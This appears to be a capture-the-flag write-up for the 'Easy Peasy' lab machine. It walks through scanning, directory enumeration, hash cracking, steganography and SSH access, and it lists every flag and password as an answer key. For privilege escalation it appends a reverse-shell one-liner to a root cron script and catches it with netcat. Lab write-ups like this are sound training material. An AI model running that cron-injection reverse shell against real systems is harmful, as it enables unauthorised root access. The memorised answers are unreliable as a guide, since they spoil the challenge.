# Easy Peasy #### rustscan > port 80,6498,65524 `NGINX es un servidor web open source de alta performance que ofrece el contenido estático de un sitio web de forma rápida y fácil de configurar. Ofrece recursos de equilibrio de carga, proxy inverso y streaming, además de gestionar miles de conexiones simultáneas.` #### gobuster ``` gobuster dir --url http://10.10.60.150 -w /usr/share/wordlists/dirb/common.txt -t 30 -k -x py,html,txt ``` > found hidden then whatever paths #### cyberchef `ZmxhZ3tmMXJzN19mbDRnfQ==` *recipe from base64* `a18672860d0510e5ab6699730763b250` *found 10.10.60.150:65524/robots.txt* [md5hashing](https://md5hashing.net/hash/md5/a18672860d0510e5ab6699730763b250) `sourcode 10.10.60.150:65524` *flag{9fdafbd64c47471a8f54cd3fc64cd312}* > its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu \==from base62 /n0th1ng3ls3m4tt3r== #### john \==hash found in hidden dir -> 940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81== ``` john --wordlist=/home/kali/Downloads/easypeasy/easypeasy.txt hash --format=GOST ``` `mypasswordforthatjob` #### steghide > download the matrix img ``` steghide extract -sf binarycodepixabay.jpg ``` ``` cat secrettext.txt ``` > username:boring password: 01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001 `cyberchef -> boring:iconvertedmypasswordtobinary` #### ssh ``` ssh boring@10.10.60.150 -p 6498 ``` > found synt{a0jvgf33zfa0ez4y} -> rot13 `flag{n0wits33msn0rm4l}` #### priv esc ``` cat /etc/crontab ``` > There is an interesting cron job being run .mysecretcronjob.sh every minute. We can see that it is being run by root. ``` ls -all /var/www/.mysecretcronjob.sh ``` > -rwxr-xr-x 1 boring boring 33 Jun 14 2020 /var/www/.mysecretcronjob.sh [revshells](https://www.revshells.com/) ``` echo 'bash -i >& /dev/tcp/10.18.1.00/4444 0>&1' >> /var/www/.mysecretcronjob.sh ``` `kali machine` ``` rlwrap nc -nlvp 4444 ``` ``` cd /root ``` ``` ls -all ``` > found it .root.txt > flag{63a9f0ea7bb98050796b649e85481845} * How many ports are open? *3* * What is the version of nginx?*1.16.1* * What is running on the highest port?*Apache* * Using GoBuster, find flag 1.*flag{f1rs7\_fl4g}* * Further enumerate the machine, what is flag 2?*flag{1m\_s3c0nd\_fl4g}* * Crack the hash with easypeasy.txt, What is the flag 3?*flag{9fdafbd64c47471a8f54cd3fc64cd312}* * What is the hidden directory?*/n0th1ng3ls3m4tt3r* * Using the wordlist that provided to you in this task crack the hash what is the password? *mypasswordforthatjob* * What is the password to login to the machine via SSH?*iconvertedmypasswordtobinary* * What is the user flag?*flag{n0wits33msn0rm4l}* * What is the root flag? *flag{63a9f0ea7bb98050796b649e85481845}* \[\[Chocolate Factory]] --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jesusgavancho.gitbook.io/writeups/easy-peasy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.